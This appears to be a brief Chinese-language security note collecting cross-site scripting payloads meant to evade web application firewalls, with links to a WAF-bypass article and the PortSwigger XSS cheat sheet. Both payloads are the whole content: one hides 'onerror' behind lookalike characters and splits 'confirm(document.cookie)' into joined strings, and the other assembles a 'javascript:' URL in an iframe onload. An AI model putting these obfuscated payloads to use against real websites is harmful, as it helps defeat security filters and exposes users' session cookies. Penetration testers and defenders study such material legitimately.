持续补充中。。
payload:
<img+src=x+οnerrοr=“eval(‘con’%20%2B’fi’%20%2B’rm(document.cookie)’)”>
其他payload可自行尝试:
<iframe/onload='this["src"]="jav"+"as	cr"+"ipt:con"+"fir"+"m()"';>
原文参考:
https://hadess.io/waf-bypass-methods/
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet